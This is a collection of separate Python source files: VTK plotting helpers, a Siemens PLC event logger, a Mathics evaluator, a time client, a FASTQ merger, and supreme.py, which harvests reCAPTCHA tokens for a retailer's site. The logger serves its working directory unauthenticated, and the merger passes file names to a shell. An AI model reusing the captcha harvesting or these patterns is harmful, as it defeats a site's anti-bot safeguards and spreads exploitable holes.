vtk.vtkLineSource() lines_source.Update() glyph3D = vtk.vtkGlyph3D() glyph3D.SetSourceData(lines_source.GetOutput()) glyph3D.SetInputData(pdata) glyph3D.SetVectorModeToUseVector() glyph3D.Update() # Create mapper mapper = vtk.vtkDataSetMapper() mapper.SetInputConnection(glyph3D.GetOutputPort()) # Create actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().LightingOff() return actor, mapper def CreateArrowsActor(pdata): """ Creates an actor composed of arrows """ # Create arrow object arrow = vtk.vtkArrowSource() arrow.Update() glyph3D = vtk.vtkGlyph3D() glyph3D.SetSourceData(arrow.GetOutput()) glyph3D.SetInputData(pdata) glyph3D.SetVectorModeToUseVector() glyph3D.Update() # Create mapper mapper = vtk.vtkDataSetMapper() mapper.SetInputConnection(glyph3D.GetOutputPort()) # Create actor actor = vtk.vtkActor() actor.SetMapper(mapper) actor.GetProperty().LightingOff() return actor def PlotGrids(grids, wFEM=False, background=[0, 0, 0], style='wireframe', legend_entries=None): """ Creates a plot of several grids as wireframes. When wFEM is true, the first grid is a white solid """ # Make grid colors N = len(grids) HSV_tuples = [(x * 1.0 / N, 0.5, 0.5) for x in range(N)] colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), HSV_tuples)) pobj = PlotClass() for i in range(len(grids)): if not i and wFEM: # Special plotting for first grid pobj.AddMesh(grids[i]) else: pobj.AddMesh(grids[i], color=colors[i], style=style) # Render plot and delete when finished pobj.SetBackground(background) if legend_entries: legend = [] for i in range(len(legend_entries)): legend.append([legend_entries[i], colors[i]]) pobj.AddLegend(legend) pobj.Plot() def PlotEdges(mesh, angle, width=10): """ Plots edges of a mesh """ edges = vtkInterface.GetEdgePoints(mesh, angle, False) pobj = PlotClass() pobj.AddLines(edges, [0, 1, 1], width) pobj.AddMesh(mesh) pobj.Plot() def PlotBoundaries(mesh, **args): """ Plots boundaries of a mesh """ featureEdges = vtk.vtkFeatureEdges() featureEdges.SetInputData(mesh) featureEdges.FeatureEdgesOff() featureEdges.BoundaryEdgesOn() featureEdges.NonManifoldEdgesOn() featureEdges.ManifoldEdgesOff() featureEdges.Update() edges = vtkInterface.PolyData(featureEdges.GetOutput()) plobj = PlotClass() plobj.AddMesh(edges, 'r', style='wireframe') plobj.AddMesh(mesh) plobj.Plot() def MakeLegendPoly(): """ Creates a legend polydata object """ pts = np.zeros((4, 3)) vtkpoints = vtkInterface.MakevtkPoints(pts) triangles = np.array([[4, 0, 1, 2, 3]], np.int64) vtkcells = vtk.vtkCellArray() vtkcells.SetCells(triangles.shape[0], VN.numpy_to_vtkIdTypeArray(triangles, deep=True)) # Create polydata object mesh = vtk.vtkPolyData() mesh.SetPoints(vtkpoints) mesh.SetPolys(vtkcells) return mesh def ParseColor(color): """ Parses color into a vtk friendly rgb list """ if color is None: return [1, 1, 1] elif isinstance(color, str): return vtkInterface.StringToRGB(color) elif len(color) == 3: return color else: raise Exception(""" Invalid color input Must ba string, rgb list, or hex color string. For example: color='white' color='w' color=[1, 1, 1] color='#FFFFFF'""") def ParseFontFamily(font_family): """ checks font name """ # check font name font_family = font_family.lower() if font_family not in ['courier', 'times', 'arial']: raise Exception('Font must be either "courier", "times" ' + 'or "arial"') return font_keys[font_family]
S7Logger.py
# Only Bool-type of memory values supported! # for taglists.txt: show all columns, select all (CTRL+A) and paste to notepad # columns should be in following order: Name, Tag table, Data type, Address # tags export to xlsx is not supported # If there is need to debug, enable this # logging.basicConfig(level=logging.DEBUG) # If you destroy/wipe the log file, append manually Memory,Type,Date,Time, to the first row! # IP-address for PLC, this is for the Distributing Station ipaddress = "169.254.0.101" # Scan time in seconds scantime = 0.1 # for offline logging. Using fixed day which is then incremented offline = False offlineDate = "2017-03-01" # import some stuff import snap7.client as c from snap7.util import * from snap7.snap7types import * import time import sys import threading import SimpleHTTPServer import SocketServer import random # create dict to store IO objects names = {} class IOObject: # counter for how many IOs we are logging IOCount = 0 # constructor def __init__(self, name, dtype, ioType, byte, bit): self.name = name self.dtype = dtype self.ioType = ioType self.byte = byte self.bit = bit self.reading = 0 self.edgeFlag = False IOObject.IOCount += 1 # display the count def displayCount(self): print IOObject.IOCount def returnName(self): return self.name def returnType(self): return self.dtype def returnIoType(self): return self.ioType def returnByte(self): return self.byte def returnBit(self): return self.bit # flag for edge detection def setEdgeFlag(self): self.edgeFlag = True # flag for resetting def resetEdgeFlag(self): self.edgeFlag = False def returnEdgeFlag(self): return self.edgeFlag def readIO(self): if self.dtype != "Bool": print "Only Boolean memory types are supported!" return # areas: # PA = Process outputs, PE = Process inputs, MK = Merkers if self.ioType == "Q": result = plc.read_area(areas['PA'], 0, int(self.byte), S7WLBit) if self.ioType == "I": result = plc.read_area(areas['PE'], 0, int(self.byte), S7WLBit) if self.ioType == "M": result = plc.read_area(areas['MK'], 0, int(self.byte), S7WLBit) # return the value return get_bool(result, 0, int(self.bit)) # for printing human-readable things about our objects def __str__(self): return "%s %s %s %s %s" % (self.name, self.dtype, self.ioType, self.byte, self.bit) # this function will read the text file and save the IOs to dict def readTags(): # okay, lets open this file taglist = open('taglist.txt', 'r') # then loop through all of the lines for line in taglist: # and split them by line break splitline = line.split('\n') # how to not name variables.. name = splitline[0].strip().split('\t') # print list(name[0]) # ignore files starting with hashtag if not list(name[0])[0] == "#": # sorry about this mess, memory addresses were tough for me address = name[3].split(".") # print address dtype = name[2] addresslist = list(address[0]) ioType = addresslist[1] byte = ''.join(addresslist[2:]) # Memory types without byte,bit type of address are not supported if len(address) > 1: # prevent indexerror bit = address[1] # call the constructor names[name[0]] = IOObject(name[0], dtype, ioType, byte, bit) # let the user know if there is any unsupported type of tags else: # instructions for user print "\nNOTICE: " + name[2] + " is not supported!" # actual logging def logToFile(): # Inputs, Outputs or Memory objects for IOM in names: # renaming thisIO = names[IOM] # read the certain IO value = thisIO.readIO() # time formatting datestamp = time.strftime('%Y-%m-%d') timestamp = time.strftime('%H:%M:%S') # Logging only if this IO is True and edge flag is on if value == True and thisIO.returnEdgeFlag(): # write to file the name and type f.write(thisIO.returnName() + "," + thisIO.returnIoType()) # and of cource date- and timestamp, duh f.write("," + datestamp + "," + timestamp + '\n') # also print something to console #print('\n' + thisIO.returnName() + " event logged") # reset the edge flag thisIO.resetEdgeFlag() # From falling edge set the edge flag if value == False: thisIO.setEdgeFlag() # random logging def offlineLogging(): # every minute, increment the day if ((int(time.strftime('%S')) % 20) == 0): global offlineDate #print offlineDate s = "-" date = offlineDate.split(s)[2] month = offlineDate.split(s)[1] year = offlineDate.split(s)[0] date = int(date) + 1 seq = (year, month, str(date)) offlineDate = s.join(seq) print "Day changed to: " + offlineDate time.sleep(random.randint(1,2)) if date == 30: raise NameError('Thank you for using offline mode!') # every second, log a random event thisIO = names[random.choice(names.keys())] timestamp = time.strftime('%H:%M:%S') # but I still did it. Logging every five seconds if (int(time.strftime('%S')) % 1) == 0: f.write(thisIO.returnName() + "," + thisIO.returnIoType()) f.write("," + offlineDate + "," + timestamp + '\n') time.sleep(random.randint(1,2)) # serving the local directory, used for providing log.csv to the frontend def my_tcp_server(): server = SocketServer.TCPServer(('', 8080), SimpleHTTPServer.SimpleHTTPRequestHandler) print 'Started httpserver on port ', 8080 server.serve_forever() # MAIN LOOP if __name__ == "__main__": # Create client plc = c.Client() # read the tags and create objects readTags() # ONLINE: lets connect if offline == False: # arguments are for rack 0, slot 2 plc.connect(ipaddress, 0, 2) # print all the IO objects to console just to make sure print "These " + str(IOObject.IOCount) + " memory addresses will be logged: " for x in names: print " " + str(names[x]) print "Online mode activated" # OFFLINE: let the user know else: print "Offline mode activated" # just a little fun to console.. sorry I was tired print "Initializing", for x in range(0, IOObject.IOCount): print ".", time.sleep(scantime) # instructions for the user print '\n' + "Use CTRL + C to end logging if you are running in console." + '\n' try: # serving the log file from local directory threading.Thread(target=my_tcp_server).start() # Scanning loop while True: # time formatting timestamp = time.strftime('%H:%M:%S') # Open the file where we log the data f = open('log.csv', 'a') # if we are online, lets log if offline == False: # Let the user know that scanning is active sys.stdout.write( '\r Scanning PLC memory on ' + timestamp + ' with the scan time of ' + str(scantime) + ' seconds' + ' on http://127.0.0.1:8080/S7PivotVisualizer.html') sys.stdout.flush() logToFile() # if we are offline, generate something random for demonstrating else: sys.stdout.write( '\r Offline mode on ' + timestamp + ' with the scan time of ' + str(scantime) + ' seconds' + ' on http://127.0.0.1:8080/S7PivotVisualizer.html') sys.stdout.flush() offlineLogging() # Close the workfile so the logged data can be viewed while the script is running f.close() # Wait for five seconds time.sleep(scantime) # to break out from loop in console (CTRL+C) except KeyboardInterrupt: logFile = open('workfile.txt', 'r') print "\n \n" + "Thank you for using S7Logger! Here are the contents of the workfile: " + "\n" for line in logFile: print line plc.disconnect() logFile.close() print "Workfile closed. Bye!"
supreme.py
import os import json import logging import threading from harvester import Harvester from main import run_all def profiles_exist(profiles_file): """ ๅ€‹ไบบๆƒ…ๅ ฑๅญ˜ๅœจใƒใ‚งใƒƒใ‚ฏ """ with open(profiles_file) as f: profiles = json.load(f) if profiles: return True def tasks_exist(tasks_file): """ ใ‚ฟใ‚นใ‚ฏใฎๅญ˜ๅœจใƒใ‚งใƒƒใ‚ฏ """ with open(tasks_file) as f: if json.load(f): return True def main(): tasks_path = os.path.abspath("data//tasks.json") profiles_path = os.path.abspath("data//profiles.json") if not tasks_exist(tasks_path): print("ใ‚ฟใ‚นใ‚ฏใŒๅญ˜ๅœจใ—ใพใ›ใ‚“") elif not profiles_exist(tasks_path): print("ๅ€‹ไบบๆƒ…ๅ ฑใŒๅญ˜ๅœจใ—ใพใ›ใ‚“") else: run_all(tasks_path, profiles_path) def start_captcha_server(): """ recaptchaๅฏพ็ญ– ใ“ใฎThreadใง5ใคใพใงrecaptchaใƒˆใƒผใ‚ฏใƒณใ‚’ใŸใ‚ใ‚‹ Threadใฎๆ›ธใ่พผใฟ็ซถๅˆใ‚’้ฟใ‘ใ‚‹ใŸใ‚ใซใƒญใƒƒใ‚ฏใƒ•ใƒฉใ‚ฐใ‚’ๆŒใคใ“ใจ """ logging.getLogger('harvester').setLevel(logging.CRITICAL) harvester = Harvester() harvester.intercept_recaptcha_v2( domain='www.supremenewyork.com', sitekey='6LeWwRkUAAAAAOBsau7KpuC9AV-6J8mhw4AjC3Xz' ) server_thread = threading.Thread(target=harvester.serve, daemon=True) server_thread.start() harvester.launch_browser() if __name__ == "__main__": start_captcha_server() main()
evaluation.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import pickle from queue import Queue import os import sys from threading import Thread, stack_size as set_thread_stack_size from typing import Tuple from mathics_scanner import TranslateError from mathics import settings from mathics.core.expression import ensure_context, KeyComparable, SymbolAborted FORMATS = [ "StandardForm", "FullForm", "TraditionalForm", "OutputForm", "InputForm", "TeXForm", "MathMLForm", "MatrixForm", "TableForm", ] class EvaluationInterrupt(Exception): pass class AbortInterrupt(EvaluationInterrupt): pass class TimeoutInterrupt(EvaluationInterrupt): pass class ReturnInterrupt(EvaluationInterrupt): def __init__(self, expr): self.expr = expr class BreakInterrupt(EvaluationInterrupt): pass class ContinueInterrupt(EvaluationInterrupt): pass class WLThrowInterrupt(EvaluationInterrupt): def __init__(self, value, tag=None): self.tag = tag self.value = value def _thread_target(request, queue) -> None: try: result = request() queue.put((True, result)) except BaseException: exc_info = sys.exc_info() queue.put((False, exc_info)) # MAX_RECURSION_DEPTH gives the maximum value allowed for $RecursionLimit. it's usually set to its # default settings.DEFAULT_MAX_RECURSION_DEPTH. MAX_RECURSION_DEPTH = max( settings.DEFAULT_MAX_RECURSION_DEPTH, int(os.getenv("MATHICS_MAX_RECURSION_DEPTH", settings.DEFAULT_MAX_RECURSION_DEPTH)), ) def python_recursion_depth(n) -> int: # convert Mathics recursion depth to Python recursion depth. this estimates how many Python calls # we need at worst to process one Mathics recursion. return 200 + 30 * n def python_stack_size(n) -> int: # n is a Mathics recursion depth # python_stack_frame_size is the (maximum) number of bytes Python needs for one call on the stack. python_stack_frame_size = 512 # value estimated experimentally return python_recursion_depth(n) * python_stack_frame_size def set_python_recursion_limit(n) -> None: "Sets the required python recursion limit given $RecursionLimit value" python_depth = python_recursion_depth(n) sys.setrecursionlimit(python_depth) if sys.getrecursionlimit() != python_depth: raise OverflowError def run_with_timeout_and_stack(request, timeout, evaluation): """ interrupts evaluation after a given time period. Provides a suitable stack environment. """ # only use set_thread_stack_size if max recursion depth was changed via the environment variable # MATHICS_MAX_RECURSION_DEPTH. if it is set, we always use a thread, even if timeout is None, in # order to be able to set the thread stack size. if MAX_RECURSION_DEPTH > settings.DEFAULT_MAX_RECURSION_DEPTH: set_thread_stack_size(python_stack_size(MAX_RECURSION_DEPTH)) elif timeout is None: return request() queue = Queue(maxsize=1) # stores the result or exception thread = Thread(target=_thread_target, args=(request, queue)) thread.start() # Thead join(timeout) can leave zombie threads (we are the parent) # when a time out occurs, but the thread hasn't terminated. See # https://docs.python.org/3/library/multiprocessing.shared_memory.html # for a detailed discussion of this. # # To reduce this problem, we make use of specific properties of # the Mathics evaluator: if we set "evaluation.timeout", the # next call to "Expression.evaluate" in the thread will finish it # immediately. # # However this still will not terminate long-running processes # in Sympy or or libraries called by Mathics that might hang or run # for a long time. thread.join(timeout) if thread.is_alive(): evaluation.timeout = True while thread.is_alive(): pass evaluation.timeout = False evaluation.stopped = False raise TimeoutInterrupt() success, result = queue.get() if success: return result else: raise result[0].with_traceback(result[1], result[2]) class Out(KeyComparable): def __init__(self) -> None: self.is_message = False self.is_print = False self.text = "" def get_sort_key(self) -> Tuple[bool, bool, str]: return (self.is_message, self.is_print, self.text) class Message(Out): def __init__(self, symbol, tag, text: str) -> None: super(Message, self).__init__() self.is_message = True self.symbol = symbol self.tag = tag self.text = text def __str__(self) -> str: return "{}::{}: {}".format(self.symbol, self.tag, self.text) def __eq__(self, other) -> bool: return self.is_message == other.is_message and self.text == other.text def get_data(self): return { "message": True, "symbol": self.symbol, "tag": self.tag, "prefix": "%s::%s" % (self.symbol, self.tag), "text": self.text, } class Print(Out): def __init__(self, text) -> None: super(Print, self).__init__() self.is_print = True self.text = text def __str__(self) -> str: return self.text def __eq__(self, other) -> bool: return self.is_message == other.is_message and self.text == other.text def get_data(self): return { "message": False, "text": self.text, } class Result(object): def __init__(self, out, result, line_no, last_eval=None) -> None: self.out = out self.result = result self.line_no = line_no self.last_eval = last_eval def get_data(self): return { "out": [out.get_data() for out in self.out], "result": self.result, "line": self.line_no, } class Output(object): def max_stored_size(self, settings) -> int: return settings.MAX_STORED_SIZE def out(self, out): pass def clear(self, wait): raise NotImplementedError def display(self, data, metadata): raise NotImplementedError class Evaluation(object): def __init__( self, definitions=None, output=None, format="text", catch_interrupt=True ) -> None: from mathics.core.definitions import Definitions from mathics.core.expression import Symbol if definitions is None: definitions = Definitions() self.definitions = definitions self.recursion_depth = 0 self.timeout = False self.timeout_queue = [] self.stopped = False self.out = [] self.output = output if output else Output() self.listeners = {} self.options = None self.predetermined_out = None self.quiet_all = False self.format = format self.catch_interrupt = catch_interrupt self.SymbolNull = Symbol("Null") # status of last evaluate self.exc_result = self.SymbolNull self.last_eval = None def parse(self, query): "Parse a single expression and print the messages." from mathics.core.parser import MathicsSingleLineFeeder return self.parse_feeder(MathicsSingleLineFeeder(query)) def parse_evaluate(self, query, timeout=None): expr = self.parse(query) if expr is not None: return self.evaluate(expr, timeout) def parse_feeder(self, feeder): return self.parse_feeder_returning_code(feeder)[0] def parse_feeder_returning_code(self, feeder): "Parse a single expression from feeder and print the messages." from mathics.core.parser.util import parse_returning_code try: result, source_code = parse_returning_code(self.definitions, feeder) except TranslateError: self.recursion_depth = 0 self.stopped = False source_code = "" result = None feeder.send_messages(self) return result, source_code def evaluate(self, query, timeout=None, format=None): """Evaluate a Mathics expression and return the result of evaluation. On return self.exc_result will contain status of various exception type of result like $Aborted, Overflow, Break, or Continue. If none of the above applies self.exc_result is Null """ from mathics.core.expression import Symbol, Expression from mathics.core.rules import Rule self.recursion_depth = 0 self.timeout = False self.stopped = False self.exc_result = self.SymbolNull self.last_eval = None if format is None: format = self.format line_no = self.definitions.get_line_no() line_no += 1 self.definitions.set_line_no(line_no) history_length = self.definitions.get_history_length() result = None def check_io_hook(hook): return len(self.definitions.get_ownvalues(hook)) > 0 def evaluate(): if history_length > 0: self.definitions.add_rule("In", Rule(Expression("In", line_no), query)) if check_io_hook("System`$Pre"): self.last_eval = Expression("System`$Pre", query).evaluate(self) else: self.last_eval = query.evaluate(self) if check_io_hook("System`$Post"): self.last_eval = Expression("System`$Post", self.last_eval).evaluate( self ) if history_length > 0: if self.predetermined_out is not None: out_result = self.predetermined_out self.predetermined_out = None else: out_result = self.last_eval stored_result = self.get_stored_result(out_result) self.definitions.add_rule( "Out", Rule(Expression("Out", line_no), stored_result) ) if self.last_eval != self.SymbolNull: if check_io_hook("System`$PrePrint"): self.last_eval = Expression( "System`$PrePrint", self.last_eval ).evaluate(self) return self.format_output(self.last_eval, format) else: self.exec_result = self.SymbolNull return None try: try: result = run_with_timeout_and_stack(evaluate, timeout, self) except KeyboardInterrupt: if self.catch_interrupt: self.exc_result = SymbolAborted else: raise except ValueError as exc: text = str(exc) if ( text == "mpz.pow outrageous exponent" or text == "mpq.pow outrageous exp num" # noqa ): self.message("General", "ovfl") self.exc_result = Expression("Overflow") else: raise except WLThrowInterrupt as ti: if ti.tag: self.exc_result = Expression( "Hold", Expression("Throw", ti.value, ti.tag) ) else: self.exc_result = Expression("Hold", Expression("Throw", ti.value)) self.message("Throw", "nocatch", self.exc_result) except OverflowError: self.message("General", "ovfl") self.exc_result = Expression("Overflow") except BreakInterrupt: self.message("Break", "nofdw") self.exc_result = Expression("Hold", Expression("Break")) except ContinueInterrupt: self.message("Continue", "nofdw") self.exc_result = Expression("Hold", Expression("Continue")) except TimeoutInterrupt: self.stopped = False self.timeout = True self.message("General", "timeout") self.exc_result = SymbolAborted except AbortInterrupt: # , error: self.exc_result = SymbolAborted except ReturnInterrupt as ret: self.exc_result = ret.expr if self.exc_result is not None: self.recursion_depth = 0 if self.exc_result != self.SymbolNull: result = self.format_output(self.exc_result, format) result = Result(self.out, result, line_no, self.last_eval) self.out = [] finally: self.stop() history_length = self.definitions.get_history_length() line = line_no - history_length while line > 0: unset_in = self.definitions.unset("In", Expression("In", line)) unset_out = self.definitions.unset("Out", Expression("Out", line)) if not (unset_in or unset_out): break line -= 1 return result def get_stored_result(self, eval_result): """Return `eval_result` stripped of any format, e.g. FullForm, MathML, TeX that it might have been wrapped in. """ if eval_result.has_form(FORMATS, 1): return eval_result.leaves[0] return eval_result def stop(self) -> None: self.stopped = True def format_output(self, expr, format=None): if format is None: format = self.format if isinstance(format, dict): return dict((k, self.format_output(expr, f)) for k, f in format.items()) from mathics.core.expression import Expression, BoxError if format == "text": result = expr.format(self, "System`OutputForm") elif format == "xml": result = Expression("StandardForm", expr).format(self, "System`MathMLForm") elif format == "tex": result = Expression("StandardForm", expr).format(self, "System`TeXForm") elif format == "unformatted": self.exc_result = None return expr else: raise ValueError try: boxes = result.boxes_to_text(evaluation=self) except BoxError: self.message( "General", "notboxes", Expression("FullForm", result).evaluate(self) ) boxes = None return boxes def set_quiet_messages(self, messages) -> None: from mathics.core.expression import Expression value = Expression("List", *messages) self.definitions.set_ownvalue("Internal`$QuietMessages", value) def get_quiet_messages(self): from mathics.core.expression import Expression value = self.definitions.get_definition("Internal`$QuietMessages").ownvalues if value: try: value = value[0].replace except AttributeError: return [] if not isinstance(value, Expression): return [] return value.leaves def message(self, symbol, tag, *args) -> None: from mathics.core.expression import String, Symbol, Expression, from_python # Allow evaluation.message('MyBuiltin', ...) (assume # System`MyBuiltin) symbol = ensure_context(symbol) quiet_messages = set(self.get_quiet_messages()) pattern = Expression("MessageName", Symbol(symbol), String(tag)) if pattern in quiet_messages or self.quiet_all: return # Shorten the symbol's name according to the current context # settings. This makes sure we print the context, if it would # be necessary to find the symbol that this message is # attached to. symbol_shortname = self.definitions.shorten_name(symbol) if settings.DEBUG_PRINT: print("MESSAGE: %s::%s (%s)" % (symbol_shortname, tag, args)) text = self.definitions.get_value(symbol, "System`Messages", pattern, self) if text is None: pattern = Expression("MessageName", Symbol("General"), String(tag)) text = self.definitions.get_value( "System`General", "System`Messages", pattern, self ) if text is None: text = String("Message %s::%s not found." % (symbol_shortname, tag)) text = self.format_output( Expression("StringForm", text, *(from_python(arg) for arg in args)), "text" ) self.out.append(Message(symbol_shortname, tag, text)) self.output.out(self.out[-1]) def print_out(self, text) -> None: from mathics.core.expression import from_python text = self.format_output(from_python(text), "text") self.out.append(Print(text)) self.output.out(self.out[-1]) if settings.DEBUG_PRINT: print("OUT: " + text) def error(self, symbol, tag, *args) -> None: # Temporarily reset the recursion limit, to allow the message being # formatted self.recursion_depth, depth = 0, self.recursion_depth try: self.message(symbol, tag, *args) finally: self.recursion_depth = depth raise AbortInterrupt def error_args(self, symbol, given, *needed) -> None: self.message_args(symbol, given, *needed) raise AbortInterrupt def message_args(self, symbol, given, *needed) -> None: from mathics.core.expression import Symbol if len(needed) == 1: needed = needed[0] if given > 1 and needed > 1: self.message(symbol, "argrx", Symbol(symbol), given, needed) elif given == 1: self.message(symbol, "argr", Symbol(symbol), needed) elif needed == 1: self.message(symbol, "argx", Symbol(symbol), given) elif len(needed) == 2: if given == 1: self.message(symbol, "argtu", Symbol(symbol), *needed) else: self.message(symbol, "argt", Symbol(symbol), *needed) else: raise NotImplementedError def check_stopped(self) -> None: if self.stopped: raise TimeoutInterrupt def inc_recursion_depth(self) -> None: self.check_stopped() limit = self.definitions.get_config_value( "$RecursionLimit", MAX_RECURSION_DEPTH ) if limit is not None: if limit < 20: limit = 20 self.recursion_depth += 1 if self.recursion_depth > limit: self.error("$RecursionLimit", "reclim", limit) def dec_recursion_depth(self) -> None: self.recursion_depth -= 1 def add_listener(self, tag, listener) -> None: existing = self.listeners.get(tag) if existing is None: existing = self.listeners[tag] = [] existing.insert(0, listener) def remove_listener(self, tag, listener) -> None: self.listeners.get(tag).remove(listener) def publish(self, tag, *args, **kwargs) -> None: listeners = self.listeners.get(tag, []) for listener in listeners: if listener(*args, **kwargs): break
timeclient.py
#!/usr/bin/env python # -*- coding:UTF-8 -*- from socket import * from threading import Thread def gettime(address): sock = socket(AF_INET,SOCK_STREAM) sock.connect(address) tm = sock.recv(1024) sock.close() print("The time is %s" % tm.decode('ascii')) t1 = [ Thread(target=gettime, args=(('localhost',10000),)) for i in range(100) ] t2 = [ Thread(target=gettime, args=(('localhost',11000),)) for i in range(100) ] for a,b in map(None,t1,t2): a.run() b.run()
merger.py
#!/usr/bin/env python from glob import glob from accessoryFunctions.accessoryFunctions import * import shutil __author__ = 'adamkoziol' def relativesymlink(src_file, dest_file): """ https://stackoverflow.com/questions/9793631/creating-a-relative-symlink-in-python-without-using-os-chdir :param src_file: the file to be linked :param dest_file: the path and filename to which the file is to be linked """ # Perform relative symlinking try: os.symlink( # Find the relative path for the source file and the destination file os.path.relpath(src_file), os.path.relpath(dest_file) ) # Except os errors except OSError as exception: # If the os error is anything but directory exists, then raise if exception.errno != errno.EEXIST: raise class Merger(object): def idseek(self): import pandas nesteddictionary = dict() # Create a list of all the lines in the file: open(self.idfile).readlines() # Create a lambda function # Map the list to the lambda function and split the list based on the delimiter: x.split(self.delimiter) # List comprehension of individual seq IDs without whitespace: [x.rstrip() for x in ...] # self.seqids = map(lambda x: [x.rstrip() for x in x.split(self.delimiter)], open(self.idfile).readlines()) dictionary = pandas.read_excel(self.idfile).to_dict() # Iterate through the dictionary - each header from the excel file for header in dictionary: # Sample is the primary key, and value is the value of the cell for that primary key + header combination for sample, value in dictionary[header].items(): # Update the dictionary with the new data try: nesteddictionary[sample].update({header: value}) # Create the nested dictionary if it hasn't been created yet except KeyError: nesteddictionary[sample] = dict() nesteddictionary[sample].update({header: value}) # Create objects for each of the samples, rather than using a nested dictionary. It may have been possible to # skip the creation of the nested dictionary, and create the objects from the original dictionary, but there # seemed to be too many possible places for something to go wrong for line in nesteddictionary: # Create an object for each sample metadata = MetadataObject() # Set the name of the metadata to be the primary key for the sample from the excel file metadata.name = line # Find the headers and values for every sample for header, value in nesteddictionary[line].items(): # Try/except for value.encode() - some of the value are type int, so they cannot be encoded try: # Create each attribute - use the header (in lowercase, and spaces removed) as the attribute name, # and the value as the attribute value setattr(metadata, header.replace(' ', '').lower(), str(value)) except AttributeError: setattr(metadata, header.replace(' ', '').lower(), value) # Append the object to the list of objects self.metadata.append(metadata) for sample in self.metadata: # Sort the seqIDs sample.merge = sorted(sample.merge.split(self.delimiter)) def idfind(self): """Find the fastq files associated with the seq IDs pulled from the seq ID file. Populate a MetadataObject with the name of the merged files as well as the fastq file names and paths""" for sample in self.metadata: # Create the general category for the MetadataObject sample.general = GenObject() sample.general.fastqfiles = list() for ids in sample.merge: # Ensure that the id exists. Dues to the way the ids were pulled from the file, newline characters # will be entered into the list. Skip them if ids: # Glob for files in the path with the seq ID and 'fastq' idfile = glob.glob('{}{}*fastq*'.format(self.path, ids)) # Assertion to ensure that all the files specified in :self.idfile are present in the path assert idfile, 'Cannot find files for seq ID: {}. Please check that the seqIDs ' \ 'provided in the seq ID file match the files present in the path'.format(ids) # Append the fastq file and path and the seq ID to the appropriate list sample.general.fastqfiles.append(idfile) def idmerge(self): """Merge the files together""" from threading import Thread # for i in range(self.cpus): # Send the threads to the merge method. :args is empty as I'm using threads = Thread(target=self.merge, args=()) # Set the daemon to true - something to do with thread management threads.setDaemon(True) # Start the threading threads.start() for sample in self.metadata: # Initialise strings to hold the forward and reverse fastq files forwardfiles = list() reversefiles = list() # Create the output directory sample.general.outputdir = '{}{}'.format(self.path, sample.name) make_path(sample.general.outputdir) # Iterate through the samples for files in sample.general.fastqfiles: # Find the forward and reverse files (forward files must have have either _R1_ or _1_ for fastq in files: if '_R1_' in fastq or '_1_' in fastq or '_1.' in fastq: forwardfiles.append(fastq) elif '_R2_' in fastq or '_2_' in fastq or '_2.' in fastq: reversefiles.append(fastq) # Add the files to the processing queue sample.general.outputforward = '{}/{}_S1_L001_R1_001.fastq.gz'.format(sample.general.outputdir, sample.name) sample.general.outputreverse = '{}/{}_S1_L001_R2_001.fastq.gz'.format(sample.general.outputdir, sample.name) # Add the command object to self.data sample.commands = GenObject() sample.commands.forwardmerge = 'cat {} > {}'.format(' '.join(forwardfiles), sample.general.outputforward) sample.commands.reversemerge = 'cat {} > {}'.format(' '.join(reversefiles), sample.general.outputreverse) # Add the commands to the queue self.mergequeue.put((sample.commands.forwardmerge, sample.general.outputforward)) self.mergequeue.put((sample.commands.reversemerge, sample.general.outputreverse)) # Join the threads self.mergequeue.join() def merge(self): while True: # while daemon # Unpack the merge command and the output file from the queue (mergecommand, outputfile) = self.mergequeue.get() # Don't run the command if the output file exists if not os.path.isfile(outputfile): try: self.execute(mergecommand) except KeyboardInterrupt: printtime(u'Keyboard interrupt! The system call will not stop until it is finished.', self.start) self.mergequeue.empty() try: os.remove(outputfile) except IOError: pass sys.exit() # Signal to mergequeue that job is done self.mergequeue.task_done() def filelink(self): # If the creation of a sample sheet is necessary if self.samplesheet: # Extract the path of the current script from the full path + file name samplesheet = open('{}/SampleSheet.csv'.format(os.path.split(os.path.abspath(__file__))[0])).readlines() # Iterate through each merged file for sample in self.data: # Append enough information to the list to allow the pipeline to work samplesheet.append('{},{},,,NA,NA,NA,NA,NA,NA\n'.format(sample.name, sample.name)) # Initialise the name and path of the output sample sheet outsamplesheet = '{}/SampleSheet.csv'.format(self.assemblypath) # Don't overwrite a sample sheet already present in the directory if not os.path.isfile(outsamplesheet): # Open the file to write and write to it with open(outsamplesheet, 'w') as writesheet: writesheet.write(''.join(samplesheet)) # Optionally copy if self.copy: make_path('{}/BestAssemblies'.format(self.assemblypath)) # Link the files to the assembly path for sample in self.metadata: try: if self.copy: shutil.copyfile(sample.general.outputforward, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputforward))) shutil.copyfile(sample.general.outputreverse, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputreverse))) else: if self.relativepaths: relativesymlink(sample.general.outputforward, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputforward))) relativesymlink(sample.general.outputreverse, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputreverse))) else: os.symlink(sample.general.outputforward, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputforward))) os.symlink(sample.general.outputreverse, '{}/{}'.format(self.assemblypath, os.path.basename(sample.general.outputreverse))) # Except os errors except OSError as exception: # If the os error is anything but directory exists, then raise if exception.errno != errno.EEXIST: raise # Remove the BestAssemblies directory if necessary if self.copy: os.removedirs('{}/BestAssemblies'.format(self.assemblypath)) def execute(self, command, outfile=""): """ Allows for dots to be printed to the terminal while waiting for a long system call to run :param command: the command to be executed :param outfile: optional string of an output file from https://stackoverflow.com/questions/4417546/constantly-print-subprocess-output-while-process-is-running """ import time from subprocess import Popen, PIPE, STDOUT # Initialise the starting time start = int(time.time()) maxtime = 0 # Run the commands - direct stdout to PIPE and stderr to stdout process = Popen(command, shell=True, stdout=PIPE, stderr=STDOUT) # Create the output file - if not provided, then nothing should happen writeout = open(outfile, "ab+") if outfile else "" # Poll process for new output until finished while True: # If an output file name is provided if outfile: # Get stdout into a variable nextline = process.stdout.readline() # Print stdout to the file writeout.write(nextline) # Break from the loop if the command is finished if process.poll() is not None: break # Adding sleep commands slowed down this method when there was lots of output. Difference between the start # time of the analysis and the current time. Action on each second passed currenttime = int(time.time()) # As each thread will print a dot at the same time, often the dots printed to the terminal do not look # even. Instead of 80 per line, there are sometimes around 78-82, or just one. Having this random number # seems to fix this from random import randint # Set the number to be a random integer between 0 and 999 number = randint(0, 999) if currenttime - 